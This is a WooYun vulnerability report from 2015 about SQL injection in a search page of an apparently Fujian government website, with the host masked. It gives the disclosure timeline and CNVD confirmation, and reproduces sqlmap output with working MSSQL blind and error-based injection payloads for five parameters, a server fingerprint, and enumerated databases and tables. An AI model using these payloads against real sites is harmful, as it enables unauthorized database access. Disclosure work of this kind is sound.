乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-12: 细节已通知厂商并且等待厂商处理中 2015-08-12: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-08-22: 细节向核心白帽子及相关领域专家公开 2015-09-01: 细节向普通白帽子公开 2015-09-11: 细节向实习白帽子公开 2015-09-26: 细节向公众公开
RT
tartget:http://**.**.**.**/searchlist.aspx?p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=1&txttitle=Mr. (GET)sqlmap:
sqlmap identified the following injection point(s) with a total of 1010 HTTP(s) requests:---Parameter: txtAuthor (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98';IF(3089=3089) SELECT 3089 ELSE DROP FUNCTION Dxme--&txtendtime=1&txtSource=1&txtstarttime=1&txttitle=Mr.Parameter: txtSource (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1';IF(5277=5277) SELECT 5277 ELSE DROP FUNCTION hXrh--&txtstarttime=1&txttitle=Mr.Parameter: txtendtime (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=(SELECT (CASE WHEN (8983=8983) THEN 8983 ELSE 8983*(SELECT 8983 FROM master..sysdatabases) END))&txtSource=1&txtstarttime=1&txttitle=Mr. Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1 AND 2790=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2790=2790) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(122)+CHAR(113)))&txtSource=1&txtstarttime=1&txttitle=Mr.Parameter: txttitle (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=1&txttitle=Mr.';IF(1707=1707) SELECT 1707 ELSE DROP FUNCTION xozv--Parameter: txtstarttime (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=(SELECT (CASE WHEN (6166=6166) THEN 6166 ELSE 6166*(SELECT 6166 FROM master..sysdatabases) END))&txttitle=Mr. Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=1 AND 2897=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2897=2897) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(122)+CHAR(113)))&txttitle=Mr.---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000
数据:
available databases [9]:[*] bobo111501[*] db_TC[*] fjtjnew[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
example
Database: fjtjnew[34 tables]+--------------------------------------------+| TC_News || TC_News_Class || TC_Work || TC_Work_Class || TC_Work_Url || TC_special_news || dtproperties || sysconstraints || syssegments || tJgcx || tLinks || tMyzj || tMyzj_List || tNews || tNewsClass || tNewsUn || tSubOptions || tSubTitle || tSubject || tSysMenus || tSysUsers || tTgxx || tTjlm || tWork || tWorkClass || tWorkUrl || tZfYjx || tZfxxgkClass || tZfysqgk || tZrxx || tZxft || tZxftImg || tZxftInfo || tZxftWtzj |+--------------------------------------------+
点到为止
如上
过滤
危害等级:中
漏洞Rank:9
确认时间:2015-08-12 16:23
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给福建分中心,由福建分中心后续协调网站管理单位处置。
暂无
